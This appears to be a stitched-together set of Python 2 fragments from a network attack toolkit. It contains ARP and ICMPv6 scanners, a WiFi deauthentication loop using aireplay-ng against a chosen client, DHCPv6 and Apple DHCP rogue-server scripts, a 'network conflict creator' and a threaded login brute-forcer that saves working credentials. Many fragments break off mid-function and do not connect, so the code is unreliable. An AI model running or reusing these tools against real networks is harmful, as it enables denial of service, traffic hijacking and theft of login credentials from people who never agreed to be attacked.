def scan(self, network_interface, timeout=3, retry=3, target_mac_address=None, check_vendor=True):
# region Set variables
self.target_mac_address = target_mac_address
self.network_interface = network_interface
self.timeout = int(timeout)
self.retry_number = int(retry)
self.icmpv6_identifier = randint(1, 65535)
# endregion
# region Run sniffer
tm = ThreadManager(2)
tm.add_task(self.sniff)
# endregion
# region Run sender
self.send()
# endregion
# region Wait
sleep(self.timeout)
# endregion
# region Unique results
for index in range(len(self.results)):
if self.results[index]['mac-address'] not in self.mac_addresses:
self.unique_results.append(self.results[index])
self.mac_addresses.append(self.results[index]['mac-address'])
# endregion
# region Reset results and mac addresses list
self.results = []
self.mac_addresses = []
# endregion
# region Get vendors
for result_index in range(len(self.unique_results)):
# Get current MAC address prefix
current_mac_prefix = self.eth.get_mac_prefix(self.unique_results[result_index]['mac-address'])
# Search this prefix in vendor list
for vendor_index in range(len(self.vendor_list)):
if current_mac_prefix == self.vendor_list[vendor_index]['prefix']:
self.unique_results[result_index]['vendor'] = self.vendor_list[vendor_index]['vendor']
break
# Could not find this prefix in vendor list
if 'vendor' not in self.unique_results[result_index].keys():
self.unique_results[result_index]['vendor'] = "Unknown vendor"
# endregion
# region Return results
return self.unique_results
def deauth_packets_send():
# Start DHCP or ARP requests sniffer function
tm = ThreadManager(2)
tm.add_task(dhcp_request_sniffer)
sleep(3)
# Set WiFi channel on interface for send WiFi deauth packets
sub.Popen(['iwconfig ' + deauth_network_interface + ' channel ' + channel],
shell=True)
Base.print_info("Send WiFi deauth packets ...")
# Start deauth packets numbers = 3
deauth_packets_number = 3
while not sniff_dhcp_request:
# Start aireplay-ng process
try:
aireplay_process = sub.Popen([
'aireplay-ng ' + deauth_network_interface + ' -0 ' +
str(deauth_packets_number) + ' -a ' + bssid + ' -c ' +
target_mac_address
],
shell=True,
stdout=sub.PIPE)
while True:
output = aireplay_process.stdout.readline()
if output == '' and aireplay_process.poll() is not None:
break
if output:
stdout.write(
re.sub(r'(\d\d:\d\d:\d\d (Waiting|Sending))',
Base.c_info + r'\g<1>', output))
except OSError as e:
if e.errno == errno.ENOENT:
Base.print_error("Program: ", "aireply-ng",
" is not installed!")
exit(1)
else:
Base.print_error(
"Something else went wrong while trying to run ",
"`aireply-ng`")
exit(2)
# Wait before sniff ARP or DHCP request packet
sleep(5)
# Add 5 packets to number of WiFi deauth packets
if deauth_packets_number < 30:
deauth_packets_number += 5
def get_mac_address(self,
network_interface,
target_ip_address,
timeout=5,
retry=5):
try:
# region Set variables
self.target_ip_address = target_ip_address
self.network_interface = network_interface
self.timeout = int(timeout)
self.retry_number = int(retry)
# endregion
# region Run sniffer
tm = ThreadManager(2)
tm.add_task(self.sniff)
# endregion
# region Run sender
self.send()
# endregion
# region Wait
sleep(self.timeout)
# endregion
# region Return
if 'mac-address' in self.results[0].keys():
return self.results[0]['mac-address']
else:
return "ff:ff:ff:ff:ff:ff"
# endregion
except IndexError:
return "ff:ff:ff:ff:ff:ff"
except KeyboardInterrupt:
self.base.print_info("Exit")
exit(0)
def search_router(self, network_interface, timeout=3, retry=3):
# region Set variables
self.router_search = True
self.network_interface = network_interface
self.timeout = int(timeout)
self.retry_number = int(retry)
# endregion
# region Run sniffer
tm = ThreadManager(2)
tm.add_task(self.sniff)
# endregion
# region Run sender
self.send()
# endregion
# region Wait
sleep(self.timeout)
# endregion
# region Return results
return self.router_info
from tm import ThreadManager
from sys import exit
from argparse import ArgumentParser
from socket import socket, AF_PACKET, SOCK_RAW, htons
from random import randint
from time import sleep
from os import errno
import subprocess as sub
# endregion
# region Check user, platform and create threads
Base = Base()
Base.check_user()
Base.check_platform()
tm = ThreadManager(5)
# endregion
# region Parse script arguments
parser = ArgumentParser(description='DHCPv6 Rogue server')
parser.add_argument('-i',
'--interface',
help='Set interface name for send reply packets')
parser.add_argument('-p',
'--prefix',
type=str,
help='Set network prefix',
default='fd00::/64')
parser.add_argument('-f',
option_code=_dhcp_option_code,
relay_agent_ip=_current_ip_address)
sendp(request_packet,
iface=_current_network_interface,
verbose=False)
except KeyError:
print Base.c_error + "Key error, this transaction id: " + hex(
xid) + " not found in our transactions!"
except:
print Base.c_error + "Unknown error!"
if request[DHCP].options[0][1] == 5:
_ack_received = True
print Base.c_success + "ACK from: " + Base.cSUCCESS + siaddr + Base.cEND + " your client ip: " + \
Base.cSUCCESS + yiaddr + Base.cEND
if request[DHCP].options[0][1] == 6:
print Base.c_error + "NAK from: " + Base.cERROR + siaddr + Base.cEND + " your client ip: " + \
Base.cERROR + yiaddr + Base.cEND
if __name__ == "__main__":
tm = ThreadManager(2)
tm.add_task(send_dhcp_discover)
print Base.c_info + "Sniffing interface: " + str(
_current_network_interface)
sniff(filter="udp and src port 67 and dst port 67 and dst host " +
_current_ip_address,
prn=send_dhcp_request,
iface=_current_network_interface)
Base.check_platform()
Base.check_user()
current_network_interface = None
src_mac_address = None
src_ip_address = None
src_port = None
dst_mac_address = None
dst_ip_address = None
dst_port = None
data = None
tm = ThreadManager(3)
response_sequence_number = 0
response_acknowledgement_number = 0
response_timestamp = 0
response_payload_len = 0
def sender():
sleep(5)
SOCK = socket(AF_PACKET, SOCK_RAW)
SOCK.bind((current_network_interface, 0))
sequence = randint(1, 1000000)
path.append(utils_path)
from base import Base
from network import Ethernet_raw, ARP_raw, IP_raw, UDP_raw, DHCP_raw
from sys import exit
from argparse import ArgumentParser
from socket import socket, AF_PACKET, SOCK_RAW, htons
from tm import ThreadManager
from time import sleep
# endregion
# region Check user, platform and create threads
Base = Base()
Base.check_user()
Base.check_platform()
tm = ThreadManager(3)
# endregion
# region Parse script arguments
parser = ArgumentParser(description='Apple DHCP Rogue server')
parser.add_argument('-i',
'--interface',
help='Set interface name for send DHCP reply packets')
parser.add_argument('-t',
'--target_mac',
help='Set target MAC address, required!',
required=True)
parser.add_argument('-I',
'--target_ip',
help='Set client IP address, required!',
if target_mac == "ff:ff:ff:ff:ff:ff":
Base.print_error(
"Could not find device MAC address with IP address: ",
target_ip)
exit(1)
else:
apple_device = [target_ip, target_mac]
# endregion
# region Print target IP and MAC address
Base.print_info("Target: ",
apple_device[0] + " (" + apple_device[1] + ")")
# endregion
# region Start sniffer
tm = ThreadManager(2)
tm.add_task(sniffer)
# endregion
# region Send first ARP reply
sleep(5)
Base.print_warning("Send first (init) ARP reply ...")
send_arp_reply()
# endregion
# region Wait for completion
tm.wait_for_completion()
# endregion
except KeyboardInterrupt:
Base.print_info("Exit")
login_list_len = len(login_list)
print output.info + "Login list size: " + str(login_list_len)
valid_login_file = host + "_" + valid_login_file
successful_login_file = host + "_" + successful_login_file
print output.info + "Valid logins write to file: " + valid_login_file
print output.info + "Successful login credentials write to file: " + valid_login_file
password_list.append(args.password)
print output.info + "Password: "******"Number of threads: " + str(args.threads)
print output.info + "Start brute ..."
if args.threads > 1:
tm = ThreadManager(args.threads + 1)
step = int(login_list_len / args.threads)
for thread in range(1, args.threads + 1):
positions = {"start": (step*(thread-1)) + 1, "stop": step*thread}
tm.add_task(brute, **positions)
sleep(1)
tm.wait_for_completion()
else:
positions = {"start": 1, "stop": login_list_len}
brute(**positions)
exit(0)
def scan(self,
network_interface,
timeout=3,
retry=3,
target_ip_address=None,
check_vendor=True):
# region Set variables
self.target_ip_address = target_ip_address
self.network_interface = network_interface
self.timeout = int(timeout)
self.retry_number = int(retry)
# endregion
# region Run sniffer
tm = ThreadManager(2)
tm.add_task(self.sniff)
# endregion
# region Run sender
self.send()
# endregion
# region Create vendor list
if check_vendor:
with open(self.mac_prefixes_file, 'r') as mac_prefixes_descriptor:
for string in mac_prefixes_descriptor.readlines():
string_list = string.split(" ", 1)
self.vendor_list.append({
"prefix": string_list[0],
"vendor": string_list[1][:-1]
})
# endregion
# region Wait
sleep(self.timeout)
# endregion
# region Unique results
for index in range(len(self.results)):
if self.results[index]['mac-address'] not in self.mac_addresses:
self.unique_results.append(self.results[index])
self.mac_addresses.append(self.results[index]['mac-address'])
# endregion
# region Reset results and mac addresses list
self.results = []
self.mac_addresses = []
# endregion
# region Get vendors
for result_index in range(len(self.unique_results)):
# Get current MAC address prefix
current_mac_prefix = self.eth.get_mac_prefix(
self.unique_results[result_index]['mac-address'])
# Search this prefix in vendor list
for vendor_index in range(len(self.vendor_list)):
if current_mac_prefix == self.vendor_list[vendor_index][
'prefix']:
self.unique_results[result_index][
'vendor'] = self.vendor_list[vendor_index]['vendor']
break
# Could not find this prefix in vendor list
if 'vendor' not in self.unique_results[result_index].keys():
self.unique_results[result_index]['vendor'] = "Unknown vendor"
# endregion
# region Return results
return self.unique_results
path.append(arp_path)
from base import Base
from network import ARP_raw, Sniff_raw
from tm import ThreadManager
from arp_scan import ArpScan
from socket import socket, AF_PACKET, SOCK_RAW
from time import sleep
from argparse import ArgumentParser
# endregion
# region Check user and platform
Base = Base()
ArpScan = ArpScan()
Sniff = Sniff_raw()
TM = ThreadManager(2)
Base.check_user()
Base.check_platform()
# endregion
# region Parse script arguments
parser = ArgumentParser(description='Network conflict creator script')
parser.add_argument('-i',
'--interface',
type=str,
help='Set interface name for listen and send packets')
parser.add_argument('-t',
'--target_ip',
type=str,